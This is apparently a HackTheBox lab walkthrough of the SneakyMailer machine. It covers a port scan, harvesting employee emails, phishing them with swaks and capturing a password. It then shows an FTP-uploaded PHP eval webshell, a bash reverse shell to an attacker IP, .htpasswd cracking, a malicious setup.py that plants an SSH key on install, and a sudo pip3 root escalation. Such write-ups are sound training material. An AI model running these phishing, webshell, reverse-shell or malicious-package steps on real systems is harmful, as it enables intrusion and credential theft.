Basic information

Port scan

$ nmap -sC -sV 10.10.10.197
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-22 12:35 CST
Nmap scan report for 10.10.10.197
Host is up (0.068s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
| 256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
|_ 256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://sneakycorp.htb
143/tcp open imap Courier Imapd (released 2018)
|_imap-capabilities: UIDPLUS completed THREAD=ORDEREDSUBJECT OK CHILDREN ACL2=UNION SORT QUOTA STARTTLS ACL THREAD=REFERENCES NAMESPACE UTF8=ACCEPTA0001 IMAP4rev1 IDLE ENABLE CAPABILITY
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after: 2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Courier Imapd (released 2018)
|_imap-capabilities: UIDPLUS completed THREAD=ORDEREDSUBJECT OK CHILDREN ACL2=UNION SORT QUOTA THREAD=REFERENCES ACL AUTH=PLAIN NAMESPACE UTF8=ACCEPTA0001 IMAP4rev1 IDLE ENABLE CAPABILITY
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after: 2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
8080/tcp open http nginx 1.14.2
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
Service Info: Host: debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.31 seconds

80

A hosts entry is needed:

10.10.10.197 sneakycorp.htb

The pypi note says modules can be installed on the server; this is probably the exploitation point once we have a foothold on the server.

The Team page lists a number of email addresses; extract them:

curl http://sneakycorp.htb/team.php | grep @sneakymailer.htb >> emails.txt
cat emails.txt | sed 's/<td>//g' | sed 's/<\/td>//g' | sed 's/ //g' > email.txt
cat email.txt

tigernixon@sneakymailer.htb
garrettwinters@sneakymailer.htb
ashtoncox@sneakymailer.htb
cedrickelly@sneakymailer.htb
airisatou@sneakymailer.htb
briellewilliamson@sneakymailer.htb
herrodchandler@sneakymailer.htb
rhonadavidson@sneakymailer.htb
colleenhurst@sneakymailer.htb
sonyafrost@sneakymailer.htb
jenagaines@sneakymailer.htb
quinnflynn@sneakymailer.htb
chardemarshall@sneakymailer.htb
haleykennedy@sneakymailer.htb
tatyanafitzpatrick@sneakymailer.htb
michaelsilva@sneakymailer.htb
paulbyrd@sneakymailer.htb
glorialittle@sneakymailer.htb
bradleygreer@sneakymailer.htb
dairios@sneakymailer.htb
jenettecaldwell@sneakymailer.htb
yuriberry@sneakymailer.htb
caesarvance@sneakymailer.htb
doriswilder@sneakymailer.htb
angelicaramos@sneakymailer.htb
gavinjoyce@sneakymailer.htb
jenniferchang@sneakymailer.htb
brendenwagner@sneakymailer.htb
fionagreen@sneakymailer.htb
shouitou@sneakymailer.htb
michellehouse@sneakymailer.htb
sukiburks@sneakymailer.htb
prescottbartlett@sneakymailer.htb
gavincortez@sneakymailer.htb
martenamccray@sneakymailer.htb
unitybutler@sneakymailer.htb
howardhatfield@sneakymailer.htb
hopefuentes@sneakymailer.htb
vivianharrell@sneakymailer.htb
timothymooney@sneakymailer.htb
jacksonbradshaw@sneakymailer.htb
olivialiang@sneakymailer.htb
brunonash@sneakymailer.htb
sakurayamamoto@sneakymailer.htb
thorwalton@sneakymailer.htb
finncamacho@sneakymailer.htb
sergebaldwin@sneakymailer.htb
zenaidafrank@sneakymailer.htb
zoritaserrano@sneakymailer.htb
jenniferacosta@sneakymailer.htb
carastevens@sneakymailer.htb
hermionebutler@sneakymailer.htb
laelgreer@sneakymailer.htb
jonasalexander@sneakymailer.htb
shaddecker@sneakymailer.htb
sulcud@sneakymailer.htb
donnasnider@sneakymailer.htb

25

Port 25 is SMTP; given the box name and the email list we obtained, this is a likely exploitation point.

143

IMAP, the mail service.

SMTP phishing

The intended path is that some employee will click the link in a phishing email; use swaks directly:

while read mail; do swaks --to $mail --from it@sneakymailer.htb --header "Subject: Credentials /Errors" --body "goto http://10.10.14.4/" --server 10.10.10.197; done < email.txt

nc -lvvp 80
Listening on any address 80 (http)
Connection from 10.10.10.197:51354
POST / HTTP/1.1
Host: 10.10.14.4
User-Agent: python-requests/2.23.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 185
Content-Type: application/x-www-form-urlencoded

firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt

The phished POST body, URL-decoded:

firstName=Paul&lastName=Byrd&email=paulbyrd@sneakymailer.htb&password=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht&rpassword=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
UserName : paulbyrd
email : paulbyrd@sneakymailer.htb
password : ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

A very complex password, yet it leaked straight away through phishing...

SMTP authentication

Then log in with a mail client (I used Evolution); note that the mail domain suffix also needs a hosts entry:

10.10.10.197 sneakycorp.htb sneakymailer.htb

In the Sent folder there is a password reset email:

Username: developer
Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

Subdomain scan

Scanning for subdomains finds dev, which will be used later:

gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -u sneakycorp.htb
Found: dev.sneakycorp.htb (Status: 200) [Size: 13742]

FTP get webshell

The developer credentials obtained above also work for FTP. Inside is a dev directory, presumably the code for the dev subdomain found earlier, so we can upload a webshell directly:

➜  SneakyMailer cat miao.php
<?php eval(@$_GET['cmd']); ?>

ftp> put miao.php
local: miao.php remote: miao.php
227 Entering Passive Mode (10,10,10,197,106,218).
150 Ok to send data.
226 Transfer complete.
31 bytes sent in 0.00 secs (420.4644 kB/s)

reverse shell

bash -c 'bash -i >& /dev/tcp/10.10.14.4/7777 0>&1'

developer

Switch from www-root to developer:

pypi.sneakycorp.htb

In /var/www there is pypi.sneakycorp.htb; add it to hosts as well. Note that accessing it directly redirects to the main site; it has to be reached on port 8080:

.htpasswd

The pypi directory contains a .htpasswd file; hashcat recovers the pypi password:

cat .htpasswd
pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/

hashcat -m 1600 hash.txt /usr/share/wordlists/rockyou.txt
$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/:soufianeelhaoui

pypi: soufianeelhaoui
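As an added example (not code from the writeup), the following Python reimplements the Apache `$apr1$` MD5-crypt scheme used in .htpasswd, so the password hashcat recovered can be verified against the stored entry offline; it takes the hash line from this box and assumes nothing beyond the standard APR algorithm.

```python
import hashlib
import hmac

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$apr1$"


def _to64(value: int, n: int) -> bytes:
    """Encode the low 6*n bits of value, least-significant group first."""
    out = bytearray()
    for _ in range(n):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def apr1_hash(password: str, salt: str) -> str:
    """Apache MD5-crypt ($apr1$): 1000 MD5 rounds keyed with the APR magic."""
    pw, sp = password.encode(), salt[:8].encode()
    ctx = hashlib.md5(pw + MAGIC + sp)
    alt = hashlib.md5(pw + sp + pw).digest()
    for remaining in range(len(pw), 0, -16):      # repeat alt up to len(pw) bytes
        ctx.update(alt[:min(16, remaining)])
    bits = len(pw)
    while bits:                                    # one byte per bit of len(pw)
        ctx.update(b"\0" if bits & 1 else pw[:1])
        bits >>= 1
    final = ctx.digest()
    for i in range(1000):                          # key-stretching rounds
        rnd = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            rnd.update(sp)
        if i % 7:
            rnd.update(pw)
        rnd.update(final if i & 1 else pw)
        final = rnd.digest()
    groups = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    enc = b"".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                   for a, b, c in groups) + _to64(final[11], 2)
    return "$apr1$" + sp.decode() + "$" + enc.decode()


def verify_htpasswd_line(line: str, password: str) -> bool:
    """Check a 'user:$apr1$salt$hash' .htpasswd line against a candidate."""
    _user, _, stored = line.strip().partition(":")
    parts = stored.split("$")
    if len(parts) != 4 or parts[1] != "apr1":
        return False                               # not an APR1 entry
    return hmac.compare_digest(apr1_hash(password, parts[2]), stored)


if __name__ == "__main__":
    # The .htpasswd line from this box and the password hashcat recovered.
    print(verify_htpasswd_line("pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/", "soufianeelhaoui"))
```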

PyPI

Now that we have the pypi password, we can upload a malicious package that executes code on install. Reference:

Malicious package

# local machine
ssh-keygen -b 2048 -t ed25519 -f ./key -q -N ""
# contents of key.pub, which setup.py will plant on the target:
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC6Ew9PQtpGf/0V00Yhu4XluLxoLh70CClimoc8IzuxI miao@miao

# target /tmp/miaopkg
cd /tmp
mkdir miaopkg
cd miaopkg
wget http://10.10.14.4:8888/.pypirc
wget http://10.10.14.4:8888/setup.py
chmod 600 .pypirc
HOME=$(pwd)
python3 setup.py sdist register -r local upload -r local

.pypirc

[distutils]
index-servers =
    local

[local]
repository: http://pypi.sneakycorp.htb:8080
username: pypi
password: soufianeelhaoui

setup.py

import setuptools

# setup.py runs when the package is built/installed on the target, so this
# appends our public key to low's authorized_keys; errors are swallowed so the
# package build still completes.
try:
    with open("/home/low/.ssh/authorized_keys", "a") as f:
        f.write("\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC6Ew9PQtpGf/0V00Yhu4XluLxoLh70CClimoc8IzuxI miao@miao")
except Exception:
    pass

setuptools.setup(
    name="miaopkg",  # Replace with your own username
    version="0.0.1",
    author="Example Author",
    author_email="author@example.com",
    description="A small example package",
    long_description="",
    long_description_content_type="text/markdown",
    url="https://github.com/pypa/sampleproject",
    packages=setuptools.find_packages(),
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
)

user flag

Log in over SSH and get user.txt:

Privilege escalation enumeration

low@sneakymailer:~$ sudo -l

sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Matching Defaults entries for low on sneakymailer:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User low may run the following commands on sneakymailer:
(root) NOPASSWD: /usr/bin/pip3

/usr/bin/pip3 can be run as root without a password, so the route is basically installing a malicious module through pip3.

Privilege escalation

Reference:

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip3 install $TF

root flag

Escalate to root and read root.txt:

References